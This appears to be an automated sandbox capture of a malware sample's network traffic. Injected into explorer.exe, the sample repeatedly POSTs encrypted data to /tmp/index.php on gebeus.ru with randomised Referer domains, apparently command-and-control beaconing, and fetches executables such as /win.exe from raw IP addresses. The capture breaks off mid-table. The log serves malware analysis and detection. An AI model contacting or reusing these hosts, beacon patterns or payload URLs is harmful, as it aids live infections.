                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              7 | 192.168.2.5 | 49717 | 58.151.148.90 | 80 | 1028 | C:\Windows\explorer.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 23, 2024 06:15:41.981666088 CEST | 283 | OUT | POST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://ljcfhqrurbdrtnbx.net/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 137
                                              Host: gebeus.ru
                                              Jul 23, 2024 06:15:41.981666088 CEST | 137 | OUT | Data Raw: 3b 6e 51 14 86 b8 68 2e a9 dc c3 01 02 74 7b b8 0c 0b cc e7 69 74 9e 63 01 7d 7e 92 37 c0 c2 6d 9b 56 ce 5f 72 1e 20 1d 9a 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 70 38 a6 92
                                              Data Ascii: ;nQh.t{itc}~7mV_r ?#1|J7 M@NA -[k,vup8BXhefIH|CZg^+R
                                              Jul 23, 2024 06:15:43.514889956 CEST | 189 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Tue, 23 Jul 2024 04:15:43 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2e 5c 24 14 a6 69 44 aa ad 10 bd cf b4 f9 6d 87 37 c6 ec 26 57 11 c2 8f 97 cb
                                              Data Ascii: #\.\$iDm7&W


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              8 | 192.168.2.5 | 49718 | 77.221.157.163 | 80 | 1028 | C:\Windows\explorer.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 23, 2024 06:15:43.529222012 CEST | 163 | OUT | GET /systemd.exe HTTP/1.1
                                              Connection: Keep-Alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Host: 77.221.157.163


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              9 | 192.168.2.5 | 49721 | 58.151.148.90 | 80 | 1028 | C:\Windows\explorer.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 23, 2024 06:16:04.168658972 CEST | 280 | OUT | POST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://gxlpbwlusmnje.org/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 112
                                              Host: gebeus.ru
                                              Jul 23, 2024 06:16:04.168658972 CEST | 112 | OUT | Data Raw: 3b 6e 51 14 86 b8 68 2e a9 dc c3 01 02 74 7b b8 0c 0b cc e7 69 74 9e 63 01 7d 7e 92 37 c0 c2 6d 9b 56 ce 5f 72 1e 20 1d 9a 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 41 58 f8 f4
                                              Data Ascii: ;nQh.t{itc}~7mV_r ?#1|J7 M@NA -[k,vuAXjVSd`=mm0/.X
                                              Jul 23, 2024 06:16:05.693042994 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Tue, 23 Jul 2024 04:16:05 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              10 | 192.168.2.5 | 49722 | 58.151.148.90 | 80 | 1028 | C:\Windows\explorer.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 23, 2024 06:16:05.701451063 CEST | 282 | OUT | POST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://ujiloutaffhspsf.org/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 133
                                              Host: gebeus.ru
                                              Jul 23, 2024 06:16:05.701488018 CEST | 133 | OUT | Data Raw: 3b 6e 51 14 86 b8 68 2e a9 dc c3 01 02 74 7b b8 0c 0b cc e7 69 74 9e 63 01 7d 7e 92 37 c0 c2 6d 9b 56 ce 5f 72 1e 20 1d 9a 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 60 3a da f2
                                              Data Ascii: ;nQh.t{itc}~7mV_r ?#1|J7 M@NA -[k,vu`:bST@g5)+7BV+"xS<
                                              Jul 23, 2024 06:16:07.614927053 CEST | 137 | IN | HTTP/1.1 200 OK
                                              Server: nginx/1.26.0
                                              Date: Tue, 23 Jul 2024 04:16:07 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              11 | 192.168.2.5 | 49723 | 58.151.148.90 | 80 | 1028 | C:\Windows\explorer.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 23, 2024 06:16:07.682085991 CEST | 281 | OUT | POST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://yfbmduchuitdam.org/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 140
                                              Host: gebeus.ru
                                              Jul 23, 2024 06:16:07.682118893 CEST | 140 | OUT | Data Raw: 3b 6e 51 14 86 b8 68 2e a9 dc c3 01 02 74 7b b8 0c 0b cc e7 69 74 9e 63 01 7d 7e 92 37 c0 c2 6d 9b 56 ce 5f 72 1e 20 1d 9a 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 3b 09 fa ea
                                              Data Ascii: ;nQh.t{itc}~7mV_r ?#1|J7 M@NA -[k,vu;[p`_(fM/R]|^TrW3q-~
                                              Jul 23, 2024 06:16:09.163501024 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Tue, 23 Jul 2024 04:16:08 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              12 | 192.168.2.5 | 49724 | 58.151.148.90 | 80 | 1028 | C:\Windows\explorer.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 23, 2024 06:16:09.173475027 CEST | 279 | OUT | POST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://jrnqiqvfjjkw.com/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 318
                                              Host: gebeus.ru
                                              Jul 23, 2024 06:16:09.173475027 CEST | 318 | OUT | Data Raw: 3b 6e 51 14 86 b8 68 2e a9 dc c3 01 02 74 7b b8 0c 0b cc e7 69 74 9e 63 01 7d 7e 92 37 c0 c2 6d 9b 56 ce 5f 72 1e 20 1d 9a 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 72 54 a2 93
                                              Data Ascii: ;nQh.t{itc}~7mV_r ?#1|J7 M@NA -[k,vurT{S~Ja2hdB97{PUXqK'KVQ.L;SyEt}f/j_b&!5R=byB#)K|S_ f
                                              Jul 23, 2024 06:16:13.255054951 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Tue, 23 Jul 2024 04:16:12 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              13 | 192.168.2.5 | 49725 | 58.151.148.90 | 80 | 1028 | C:\Windows\explorer.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 23, 2024 06:16:13.262898922 CEST | 280 | OUT | POST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://vlrfckdhdpbbw.org/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 187
                                              Host: gebeus.ru
                                              Jul 23, 2024 06:16:13.262932062 CEST | 187 | OUT | Data Raw: 3b 6e 51 14 86 b8 68 2e a9 dc c3 01 02 74 7b b8 0c 0b cc e7 69 74 9e 63 01 7d 7e 92 37 c0 c2 6d 9b 56 ce 5f 72 1e 20 1d 9a 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 51 0d c6 ea
                                              Data Ascii: ;nQh.t{itc}~7mV_r ?#1|J7 M@NA -[k,vuQfY~cEl"r}R.ll=[_\ExhJ@oRi|M.l3
                                              Jul 23, 2024 06:16:14.764192104 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Tue, 23 Jul 2024 04:16:14 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              14 | 192.168.2.5 | 49726 | 58.151.148.90 | 80 | 1028 | C:\Windows\explorer.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 23, 2024 06:16:14.772305012 CEST | 283 | OUT | POST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://qdkcshccmtjsaxfy.com/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 266
                                              Host: gebeus.ru
                                              Jul 23, 2024 06:16:14.772339106 CEST | 266 | OUT | Data Raw: 3b 6e 51 14 86 b8 68 2e a9 dc c3 01 02 74 7b b8 0c 0b cc e7 69 74 9e 63 01 7d 7e 92 37 c0 c2 6d 9b 56 ce 5f 72 1e 20 1d 9a 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 5e 59 d6 8b
                                              Data Ascii: ;nQh.t{itc}~7mV_r ?#1|J7 M@NA -[k,vu^Yn]YGMco?9s4P4^ZS:Z?/iRA)X4GK3XBw4Q3lW|wBw30b|gcGA.
                                              Jul 23, 2024 06:16:16.340675116 CEST | 185 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Tue, 23 Jul 2024 04:16:16 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2f 5f 24 17 ad 68 44 aa a9 14 bd cf b3 f9 6d 83 27 db b6 26 42 10
                                              Data Ascii: #\/_$hDm'&B


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              15 | 192.168.2.5 | 49727 | 64.190.113.113 | 80 | 1028 | C:\Windows\explorer.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 23, 2024 06:16:16.348732948 CEST | 159 | OUT | GET /win.exe HTTP/1.1
                                              Connection: Keep-Alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Host: 64.190.113.113
                                              Jul 23, 2024 06:16:16.945909023 CEST | 1236 | IN | HTTP/1.1 200 OK
                                              Date: Tue, 23 Jul 2024 04:16:16 GMT
                                              Server: Apache
                                              Last-Modified: Mon, 22 Jul 2024 19:29:34 GMT
                                              ETag: "f1600-61ddb109e6b16"
                                              Accept-Ranges: bytes
                                              Content-Length: 988672
                                              Keep-Alive: timeout=5, max=100
                                              Connection: Keep-Alive
                                              Content-Type: application/x-msdos-program


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              16 | 192.168.2.5 | 49728 | 58.151.148.90 | 80 | 1028 | C:\Windows\explorer.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 23, 2024 06:16:17.898041964 CEST | 278 | OUT | POST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://mpvhivgiojy.com/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 128
                                              Host: gebeus.ru
                                              Jul 23, 2024 06:16:17.898070097 CEST | 128 | OUT | Data Raw: 3b 6e 51 14 86 b8 68 2e a9 dc c3 01 02 74 7b b8 0c 0b cc e7 69 74 9e 63 01 7d 7e 92 37 c0 c2 6d 9b 56 ce 5f 72 1e 20 1d 9a 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2c 5b 06 6b 2c 90 f4 76 0b 75 33 55 a2 91
                                              Data Ascii: ;nQh.t{itc}~7mV_r ?#1|J7 M@NA ,[k,vu3U~gZpl?;w9Itt)mV<Vg
                                              Jul 23, 2024 06:16:20.169270039 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Tue, 23 Jul 2024 04:16:19 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              17 | 192.168.2.5 | 49729 | 58.151.148.90 | 80 | 1028 | C:\Windows\explorer.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 23, 2024 06:16:20.181471109 CEST | 281 | OUT | POST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://qkeywmaxpqyajg.net/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 329
                                              Host: gebeus.ru
                                              Jul 23, 2024 06:16:20.181504011 CEST | 329 | OUT | Data Raw: 3b 6e 51 14 86 b8 68 2e a9 dc c3 01 02 74 7b b8 0c 0b cc e7 69 74 9e 63 01 7d 7e 92 37 c0 c2 6d 9b 56 ce 5f 72 1e 20 1d 9a 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 7b 3d d7 94
                                              Data Ascii: ;nQh.t{itc}~7mV_r ?#1|J7 M@NA -[k,vu{=D1[@tv`D~u-8,>[P]DnFW@],.m$KH%0sZTQT6;|KYIo|!V3*
                                              Jul 23, 2024 06:16:22.471963882 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Tue, 23 Jul 2024 04:16:22 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              18 | 192.168.2.5 | 49730 | 58.151.148.90 | 80 | 1028 | C:\Windows\explorer.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 23, 2024 06:16:22.487385035 CEST | 281 | OUT | POST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://kyaejpplhrtmlm.com/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 361
                                              Host: gebeus.ru
                                              Jul 23, 2024 06:16:22.487385988 CEST | 361 | OUT | Data Raw: 3b 6e 51 14 86 b8 68 2e a9 dc c3 01 02 74 7b b8 0c 0b cc e7 69 74 9e 63 01 7d 7e 92 37 c0 c2 6d 9b 56 ce 5f 72 1e 20 1d 9a 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 3c 3e fd a2
                                              Data Ascii: ;nQh.t{itc}~7mV_r ?#1|J7 M@NA -[k,vu<>{7`Q}Th`{0 o.YvK9J%U1P]Me30~p`/z=,msOj)FS8fed4RoHvVOj
                                              Jul 23, 2024 06:16:24.008851051 CEST | 206 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Tue, 23 Jul 2024 04:16:23 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 06 7f 55 e7 39 04 fc ea 48 e6 8e ac a9 2d 99 61 c2 e8 6e 59 1a 82 9e 8a c0 70 9b 37 18 12 98 07 99 16 76 5a 57 ec d5 7f e5 7c
                                              Data Ascii: #\6U9H-anYp7vZW|


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              19 | 192.168.2.5 | 49733 | 58.151.148.90 | 80 | 1028 | C:\Windows\explorer.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 23, 2024 06:16:28.171829939 CEST | 281 | OUT | POST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://ochmmwawdfhift.net/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 187
                                              Host: gebeus.ru
                                              Jul 23, 2024 06:16:28.171859026 CEST | 187 | OUT | Data Raw: 3b 6e 51 14 86 b8 68 2e a9 dc c3 01 02 74 7b b8 0c 0b cc e7 69 74 9e 63 01 7d 7e 92 37 c0 c2 6d 9b 56 ce 5f 72 1e 20 1d 9a 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 05 6b 2c 90 f5 76 0b 75 2c 15 ea 83
                                              Data Ascii: ;nQh.t{itc}~7mV_r ?#1|J7 M@NA -[k,vu,XmIms!b4;kE71OyJI%5o%ZEpvK5>W.X.3
                                              Jul 23, 2024 06:16:30.248508930 CEST | 137 | IN | HTTP/1.1 200 OK
                                              Server: nginx/1.26.0
                                              Date: Tue, 23 Jul 2024 04:16:29 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              20 | 192.168.2.5 | 49749 | 58.151.148.90 | 80 | 1028 | C:\Windows\explorer.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 23, 2024 06:17:37.382864952 CEST | 279 | OUT | POST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://bmrqxjpnnmfq.org/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 270
                                              Host: gebeus.ru
                                              Jul 23, 2024 06:17:37.382864952 CEST | 270 | OUT | Data Raw: 3b 6e 51 14 86 b8 68 2e a9 dc c3 01 02 74 7b b8 0c 0b cc e7 69 74 9e 63 01 7d 7e 92 37 c0 c2 6d 9b 56 ce 5f 72 1e 20 1d 9a 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 70 1e c6 95
                                              Data Ascii: ;nQh.t{itc}~7mV_r ?#1|J7 M@NA .[k,vup"ia050B+pzXgh|JF=0vd$)/CMf713WUMHYx)^BrfIY]]XrN`'U]n
                                              Jul 23, 2024 06:17:38.906838894 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Tue, 23 Jul 2024 04:17:38 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 03 00 00 00 72 e8 84
                                              Data Ascii: r


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              21 | 192.168.2.5 | 49750 | 58.151.148.90 | 80 | 1028 | C:\Windows\explorer.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 23, 2024 06:17:43.760410070 CEST | 281 | OUT | POST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://vfkimedsiioubu.com/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 281
                                              Host: gebeus.ru
                                              Jul 23, 2024 06:17:43.760458946 CEST | 281 | OUT | Data Raw: 3b 6e 51 14 86 b8 68 2e a9 dc c3 01 02 74 7b b8 0c 0b cc e7 69 74 9e 63 01 7d 7e 92 37 c0 c2 6d 9b 56 ce 5f 72 1e 20 1d 9a 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 77 58 db 86
                                              Data Ascii: ;nQh.t{itc}~7mV_r ?#1|J7 M@NA .[k,vuwXKkZPw98~|]Y]D\U~RNC_$"o.kQWm;V"tJF<1tOd4N="yzr<;Gh
                                              Jul 23, 2024 06:17:45.280702114 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Tue, 23 Jul 2024 04:17:44 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 03 00 00 00 72 e8 84
                                              Data Ascii: r


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              22 | 192.168.2.5 | 49751 | 58.151.148.90 | 80 | 1028 | C:\Windows\explorer.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 23, 2024 06:17:49.311870098 CEST | 281 | OUT | POST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://gsqdyhadbujwtt.org/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 212
                                              Host: gebeus.ru
                                              Jul 23, 2024 06:17:49.311871052 CEST | 212 | OUT | Data Raw: 3b 6e 51 14 86 b8 68 2e a9 dc c3 01 02 74 7b b8 0c 0b cc e7 69 74 9e 63 01 7d 7e 92 37 c0 c2 6d 9b 56 ce 5f 72 1e 20 1d 9a 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3a 3a bb 80
                                              Data Ascii: ;nQh.t{itc}~7mV_r ?#1|J7 M@NA .[k,vu::nWkz07f}gcRK~u5(T+YN{cq=|SF<5h_Di#A
                                              Jul 23, 2024 06:17:51.625567913 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Tue, 23 Jul 2024 04:17:51 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 03 00 00 00 72 e8 84
                                              Data Ascii: r


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              23 | 192.168.2.5 | 49752 | 58.151.148.90 | 80 | 1028 | C:\Windows\explorer.exe
